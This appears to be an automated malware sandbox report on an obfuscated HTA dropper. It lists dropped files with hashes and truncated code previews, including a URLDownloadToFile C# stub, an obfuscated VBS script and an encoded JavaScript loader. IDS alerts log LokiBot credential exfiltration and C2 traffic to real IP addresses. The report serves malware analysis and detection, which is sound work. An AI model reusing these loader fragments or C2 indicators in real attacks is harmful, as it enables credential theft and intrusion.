SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xqg3zvcc.p1h.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\glmzcldr\CSCA9586F3AA915453C854280BCC33938CA.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.082278735136998
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryVak7YnqqpPN5Dlq5J:+RI+ycuZhNnakSpPNnqX
MD5:	4C1208CBFB618FDB7AEA3DCF53CF8F60
SHA1:	3101F097D9E4FFB872781EE2D348208A686232EE
SHA-256:	9FAF5085F9D636BA0759E24B64745F01F9073A15F6F4E5A22BED79B2CA20F7C2
SHA-512:	722715C4F20E6AB85F0032D4C106A91939099B69A7B544DCC51F3B5FF20F0B7D1286F122EE0322C5A7CA8109E24453BCBC87429D8E7F49B48A6962D47CFE95B4
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...g.l.m.z.c.l.d.r...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...g.l.m.z.c.l.d.r...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\glmzcldr\glmzcldr.0.cs

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (356)
Category:	dropped
Size (bytes):	476
Entropy (8bit):	3.7845241839287773
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuGNaD9MGbJPQXReKJ8SRHy4HzNX/bt/Qy:V/DTLDfuGIAXfH1j6y
MD5:	405282350B57E6D41B6D58A029558C64
SHA1:	6C50EC9DD86FA438A3BC1AF48A3B49F1BC364E49
SHA-256:	11A1BDC49E30FAC7BC2CBEBD22D8F4F072A449141DDD7E197F85CCB2AB331506
SHA-512:	5F45C0C1451FE0C044138C44B3708BAF9468DF7D91D1201DC05FCEF629F9CAB8FD9F66CC14A37C62A189829F1DE22D4A1135813226BFF45181283F59706DE351
Malicious:	false
Preview:	.using System;.using System.Runtime.InteropServices;..namespace yQoNsvUYQf.{. public class uGUWof. {. [DllImport("urLmON.dll", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr It,string GgbyuRjDOT,string szKzr,uint pUR,IntPtr PzX);.. }..}.

C:\Users\user\AppData\Local\Temp\glmzcldr\glmzcldr.cmdline

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
Category:	dropped
Size (bytes):	371
Entropy (8bit):	5.186690894727993
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fWQUzxs7+AEszI923fWQRn:p37Lvkmb6KzuDWZE2u+
MD5:	138F8A46FA34E1C5AFF9CF34C4BF35A8
SHA1:	CEE7D53CCDDEB497AE73822F19D1B9B918E99C75
SHA-256:	730CF73833432D8976596942F62E8222DED79F5601873FE056430BE0C9DF0272
SHA-512:	175B8A6CFCF3753D505CB551EC923407DED72385E8D5A8CBC9A19FA057764CF7C1DB6894A0DA1997F873531830866CED740EBF313A7635326CE6EB0D3A896684
Malicious:	true
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\glmzcldr\glmzcldr.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\glmzcldr\glmzcldr.0.cs"

C:\Users\user\AppData\Local\Temp\glmzcldr\glmzcldr.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3072
Entropy (8bit):	2.8143265694905186
Encrypted:	false
SSDEEP:	24:etGSPPBG5eM7p8aMJzky/hfnxItkZfoKW+qqhkWI+ycuZhNnakSpPNnq:64sM+aMthfx/JvW1EH1ulna3Lq
MD5:	D0D2E8773D9485A10B1BA6363AC26DBB
SHA1:	1088DF396823DEE84FFB387D602CB1ACF2D15749
SHA-256:	B945A9898A3CEF05EFDAB075ADA96356CEFD30F3852149F0DE9241236CE1469C
SHA-512:	04F669580F4CD5A0E4C45DBC4022CE169117D0DEF29953F871050FCE5CDADB16FC3A86EE8245A7B930D71BD96CEA6D98DD8E2E1158018114763EBB6850B8473A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k.7g...........!.................#... ...@....... ....................................@.................................X#..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................9.2.....t.....t.......................................... @.....P ......R.........X.....[.....f.....l.....p...R.....R...!.R.....R.......!............@.......................................)..........<Module>.gl

C:\Users\user\AppData\Local\Temp\glmzcldr\glmzcldr.out

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (449), with CRLF, CR line terminators
Category:	modified
Size (bytes):	870
Entropy (8bit):	5.288324805922282
Encrypted:	false
SSDEEP:	24:KMoqd3ka6KzTE2uKax5DqBVKVrdFAMBJTH:doika6aTE2uK2DcVKdBJj
MD5:	B05929CCB78BBDD625D6AFAFBE78BFF4
SHA1:	9D5A6734EFEF5D9F41C0D07CC3C185821803095D
SHA-256:	0EFA6E3DBB3EF65E60E4ADB85A7E40456B5BD9B702005EE9072BACC20391395D
SHA-512:	4289C87B5C50B41CEEE3E0C2DAD09AB3137F8E0EB433559BB32AF991A1A8545446B05A051347A1B4F5B38800D753DB8F9B3B27C3C9561E81CF7A2FDABC661271
Malicious:	false
Preview:	.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\glmzcldr\glmzcldr.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\glmzcldr\glmzcldr.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Roaming\188E93\31437F.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	56368
Entropy (8bit):	6.120994357619221
Encrypted:	false
SSDEEP:	768:fF9E8FLLs2Zokf85d9PTV6Iq8Fnqf7P+WxqWKnz8DH:ffE6EkfOd9PT86dWvKgb
MD5:	FDA8C8F2A4E100AFB14C13DFCBCAB2D2
SHA1:	19DFD86294C4A525BA21C6AF77681B2A9BBECB55
SHA-256:	99A2C778C9A6486639D0AFF1A7D2D494C2B0DC4C7913EBCB7BFEA50A2F1D0B09
SHA-512:	94F0ACE37CAE77BE9935CF4FC8AAA94691343D3B38DE5E16C663B902C220BFF513CD02256C7AF2D815A23DD30439582DDBB0880009C76BBF36FF8FBC1A6DDC18
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: invoice727282_PDF..exe, Detection: malicious, Browse Filename: #U0410#U0433#U0440#U043e-#U0410#U043b#U044c#U044f#U043d#U0441_(PO_460387320)_pdf.vbs, Detection: malicious, Browse Filename: 6038732).vbs, Detection: malicious, Browse Filename: cirby0J3LP.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe, Detection: malicious, Browse Filename: 3vj5tYFb6a.exe, Detection: malicious, Browse Filename: 50000PCSPIC12F1501-ESN.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.KeyloggerX-gen.6339.24340.exe, Detection: malicious, Browse Filename: Jdxvyx.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A>.]..............0................. ........@.. ....................................`.................................t...O.......................0B..........<................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......t3..pc.............X...<........................................0..........s.....Y.....(.....Z.....&..(......+....(....o......r...p(....-..r...p(....,.....X....i2..-;(....(..........%.r!..p.(....(....((...(....(....(....( .....-.(7...(......(....-...~S...-.~R....S...s!.....~W...o"....~U...o#....~V...o$....o%...~Y...o&...~S...~Q...~T....s'....P...~P...sE...o(............~W....@_,s.....()...r7..p.$(*........o+..........o,....2....... ....37(....(8.........%...o-....

C:\Users\user\AppData\Roaming\188E93\31437F.lck

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\89dad5d484a9f889a3a8dfca823edc3e_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
File Type:	data
Category:	dropped
Size (bytes):	47
Entropy (8bit):	1.168829563685559
Encrypted:	false
SSDEEP:	3:/lSll2DQi:AoMi
MD5:	DAB633BEBCCE13575989DCFA4E2203D6
SHA1:	33186D50F04C5B5196C1FCC1FAD17894B35AC6C7
SHA-256:	1C00FBA1B82CD386E866547F33E1526B03F59E577449792D99C882DEF05A1D17
SHA-512:	EDDBB22D9FC6065B8F5376EC95E316E7569530EFAA9EA9BC641881D763B91084DCCC05BC793E8E29131D20946392A31BD943E8FC632D91EE13ABA7B0CD1C626F
Malicious:	false
Preview:	........................................user.

C:\Users\user\AppData\Roaming\seemybestthingswithentirelifetimethingstodomyb.vbS

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-16, little-endian text, with very long lines (371), with CRLF line terminators
Category:	dropped
Size (bytes):	141862
Entropy (8bit):	3.673972784160963
Encrypted:	false
SSDEEP:	1536:HimrsnAhOid+1d3duv8/DcFjk+2Vc3GyboSgt5pzIGwm:8AhOi01F8v8/wjk+2OGybxgt5pkGwm
MD5:	100D059D24305DC95DB276AA180DC4CF
SHA1:	CB2E9D345F365A0DC65B61CF40865B223C4688AD
SHA-256:	87BE9D53A554146BCBAB91270C1EF35561F5168E6F84EA86C26D23B4C803247D
SHA-512:	14F70627CBB1ADBB26D511D92558C471CA5354A1D0FA54A33D22D7C4933B6E1873871750F53318CD9C8D4E8B3F7627BAC2F4BAC3F295A67E2D35756AD951C8F5
Malicious:	true
Preview:	..........F.u.n.c.t.i.o.n. .d.e.s.e.m.p.e.n.o.(.B.y.V.a.l. .c.a.r.r.a.m.e.l.o.,. .B.y.V.a.l. .s.o.m.b.r.o.s.o.,. .B.y.V.a.l. .p.o.r.q.u.e.t.e.s.)..... . . . .D.i.m. .a.f.a.m.a.r..... . . . .a.f.a.m.a.r. .=. .I.n.S.t.r.(.c.a.r.r.a.m.e.l.o.,. .s.o.m.b.r.o.s.o.)..... . . . ..... . . . .D.o. .W.h.i.l.e. .a.f.a.m.a.r. .>. .0..... . . . . . . . .c.a.r.r.a.m.e.l.o. .=. .L.e.f.t.(.c.a.r.r.a.m.e.l.o.,. .a.f.a.m.a.r. .-. .1.). .&. .p.o.r.q.u.e.t.e.s. .&. .M.i.d.(.c.a.r.r.a.m.e.l.o.,. .a.f.a.m.a.r. .+. .L.e.n.(.s.o.m.b.r.o.s.o.).)..... . . . . . . . .a.f.a.m.a.r. .=. .I.n.S.t.r.(.a.f.a.m.a.r. .+. .L.e.n.(.p.o.r.q.u.e.t.e.s.).,. .c.a.r.r.a.m.e.l.o.,. .s.o.m.b.r.o.s.o.)..... . . . .L.o.o.p..... . . . ..... . . . .d.e.s.e.m.p.e.n.o. .=. .c.a.r.r.a.m.e.l.o.....E.n.d. .F.u.n.c.t.i.o.n.............p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .R.e.a.d.S.t.d.I.n.(.)..... . . . .w.h.i.l.e. .N.o.t. .s.t.d.I.n...A.t.E.n.d.O.f.S.t.r.e.a.m..... . . . . . . . .R.e.a.d.S.t.d.I.n. .=. .R.e.a.d.S.t.d.I.n. .&. .s.t.d.I.n...R.

Static File Info

General

File type:	HTML document, ASCII text, with very long lines (65536), with no line terminators
Entropy (8bit):	2.00054731549885
TrID:
File name:	kissmegoodthingwhichgivemebestthignswithgirluaremy.hta
File size:	182'532 bytes
MD5:	43f15554d66e784d988aa2da3ed2a136
SHA1:	6d0fb362a8aa62a046e25435e6a525e2ca61492d
SHA256:	5c7f1d6ac7671a1b1764dba808cf52f5c5c48ce1cbd0f1c16d8f6cf0afe5d3c8
SHA512:	2c06f6a513bd10d648dfec384fc1056b0e8f39a830e0671f9098961076de61ac7db5e0dc7724a7ffd403a4769b90324aeb785d0b16c13dfe7dd24342a9460cd9
SSDEEP:	96:4vCl17J1YiZVGTVy1YiZQGTVMFxfwVXNewJrC1YiZo1YiZDjGTVs1YiZkQ:4vCldfhjGTOheGTqHwShohxjGTYhuQ
TLSH:	270495A9DC355CEDBBCC6D93B6FD72C8387C534B93E62E81822B3541DAA076C65C1821
File Content Preview:	<script language=JavaScript>m='%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253Cscript%253E%250A%253C%2521--%250Adocument.write%2528unescape%2528%2522%25253Cscript%25253E%25250A%25253C%252521--%25250Adocument.write%252528unescape%252528%25252

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-15T18:13:58.852111+0100	2858295	ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain)	1	192.3.243.136	80	192.168.2.5	49748	TCP
2024-11-15T18:14:08.904488+0100	2858795	ETPRO MALWARE ReverseLoader Payload Request (GET) M2	1	192.168.2.5	49704	192.3.243.136	80	TCP
2024-11-15T18:14:16.278435+0100	2049038	ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2	1	142.215.209.78	443	192.168.2.5	49705	TCP
2024-11-15T18:14:29.780577+0100	2858796	ETPRO MALWARE ReverseLoader Payload Request (GET) M1	1	192.168.2.5	49748	192.3.243.136	80	TCP
2024-11-15T18:14:31.426231+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49761	94.156.177.95	80	TCP
2024-11-15T18:14:31.426231+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49761	94.156.177.95	80	TCP
2024-11-15T18:14:31.426231+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49761	94.156.177.95	80	TCP
2024-11-15T18:14:32.403357+0100	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.5	49761	94.156.177.95	80	TCP
2024-11-15T18:14:32.580658+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49766	94.156.177.95	80	TCP
2024-11-15T18:14:32.580658+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49766	94.156.177.95	80	TCP
2024-11-15T18:14:32.580658+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49766	94.156.177.95	80	TCP
2024-11-15T18:14:33.528121+0100	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.5	49766	94.156.177.95	80	TCP
2024-11-15T18:14:33.648797+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49771	94.156.177.95	80	TCP
2024-11-15T18:14:33.648797+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49771	94.156.177.95	80	TCP
2024-11-15T18:14:33.648797+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49771	94.156.177.95	80	TCP
2024-11-15T18:14:34.615993+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49771	94.156.177.95	80	TCP
2024-11-15T18:14:34.615993+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49771	94.156.177.95	80	TCP
2024-11-15T18:14:34.621400+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	49771	TCP
2024-11-15T18:14:34.779935+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49776	94.156.177.95	80	TCP
2024-11-15T18:14:34.779935+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49776	94.156.177.95	80	TCP
2024-11-15T18:14:34.779935+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49776	94.156.177.95	80	TCP
2024-11-15T18:14:35.751845+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49776	94.156.177.95	80	TCP
2024-11-15T18:14:35.751845+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49776	94.156.177.95	80	TCP
2024-11-15T18:14:35.757468+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	49776	TCP
2024-11-15T18:14:35.927180+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49785	94.156.177.95	80	TCP
2024-11-15T18:14:35.927180+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49785	94.156.177.95	80	TCP
2024-11-15T18:14:35.927180+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49785	94.156.177.95	80	TCP
2024-11-15T18:14:36.861902+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49785	94.156.177.95	80	TCP
2024-11-15T18:14:36.861902+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49785	94.156.177.95	80	TCP
2024-11-15T18:14:36.867216+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	49785	TCP
2024-11-15T18:14:37.042044+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49790	94.156.177.95	80	TCP
2024-11-15T18:14:37.042044+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49790	94.156.177.95	80	TCP
2024-11-15T18:14:37.042044+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49790	94.156.177.95	80	TCP
2024-11-15T18:14:37.995017+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49790	94.156.177.95	80	TCP
2024-11-15T18:14:37.995017+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49790	94.156.177.95	80	TCP
2024-11-15T18:14:38.000486+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	49790	TCP
2024-11-15T18:14:38.155116+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49795	94.156.177.95	80	TCP
2024-11-15T18:14:38.155116+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49795	94.156.177.95	80	TCP
2024-11-15T18:14:38.155116+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49795	94.156.177.95	80	TCP
2024-11-15T18:14:39.112509+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49795	94.156.177.95	80	TCP
2024-11-15T18:14:39.112509+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49795	94.156.177.95	80	TCP
2024-11-15T18:14:39.118238+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	49795	TCP
2024-11-15T18:14:39.310499+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49801	94.156.177.95	80	TCP
2024-11-15T18:14:39.310499+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49801	94.156.177.95	80	TCP
2024-11-15T18:14:39.310499+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49801	94.156.177.95	80	TCP
2024-11-15T18:14:40.262543+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49801	94.156.177.95	80	TCP
2024-11-15T18:14:40.262543+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49801	94.156.177.95	80	TCP
2024-11-15T18:14:40.267944+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	49801	TCP
2024-11-15T18:14:40.418721+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49807	94.156.177.95	80	TCP
2024-11-15T18:14:40.418721+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49807	94.156.177.95	80	TCP
2024-11-15T18:14:40.418721+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49807	94.156.177.95	80	TCP
2024-11-15T18:14:41.385022+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49807	94.156.177.95	80	TCP
2024-11-15T18:14:41.385022+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49807	94.156.177.95	80	TCP
2024-11-15T18:14:41.391581+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	49807	TCP
2024-11-15T18:14:41.540423+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49811	94.156.177.95	80	TCP
2024-11-15T18:14:41.540423+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49811	94.156.177.95	80	TCP
2024-11-15T18:14:41.540423+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49811	94.156.177.95	80	TCP
2024-11-15T18:14:42.507084+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49811	94.156.177.95	80	TCP
2024-11-15T18:14:42.507084+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49811	94.156.177.95	80	TCP
2024-11-15T18:14:42.512208+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	49811	TCP
2024-11-15T18:14:42.666273+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49815	94.156.177.95	80	TCP
2024-11-15T18:14:42.666273+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49815	94.156.177.95	80	TCP
2024-11-15T18:14:42.666273+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49815	94.156.177.95	80	TCP
2024-11-15T18:14:43.612001+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49815	94.156.177.95	80	TCP
2024-11-15T18:14:43.612001+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49815	94.156.177.95	80	TCP
2024-11-15T18:14:43.617333+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	49815	TCP
2024-11-15T18:14:43.780827+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49820	94.156.177.95	80	TCP
2024-11-15T18:14:43.780827+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49820	94.156.177.95	80	TCP
2024-11-15T18:14:43.780827+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49820	94.156.177.95	80	TCP
2024-11-15T18:14:44.789085+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49820	94.156.177.95	80	TCP
2024-11-15T18:14:44.789085+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49820	94.156.177.95	80	TCP
2024-11-15T18:14:44.796883+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	49820	TCP
2024-11-15T18:14:44.948157+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49827	94.156.177.95	80	TCP
2024-11-15T18:14:44.948157+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49827	94.156.177.95	80	TCP
2024-11-15T18:14:44.948157+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49827	94.156.177.95	80	TCP
2024-11-15T18:14:47.376347+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49827	94.156.177.95	80	TCP
2024-11-15T18:14:47.376347+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49827	94.156.177.95	80	TCP
2024-11-15T18:14:47.382329+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	49827	TCP
2024-11-15T18:14:47.565744+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49839	94.156.177.95	80	TCP
2024-11-15T18:14:47.565744+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49839	94.156.177.95	80	TCP
2024-11-15T18:14:47.565744+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49839	94.156.177.95	80	TCP
2024-11-15T18:14:48.529208+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49839	94.156.177.95	80	TCP
2024-11-15T18:14:48.529208+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49839	94.156.177.95	80	TCP
2024-11-15T18:14:48.534810+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	49839	TCP
2024-11-15T18:14:48.732748+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49845	94.156.177.95	80	TCP
2024-11-15T18:14:48.732748+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49845	94.156.177.95	80	TCP
2024-11-15T18:14:48.732748+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49845	94.156.177.95	80	TCP
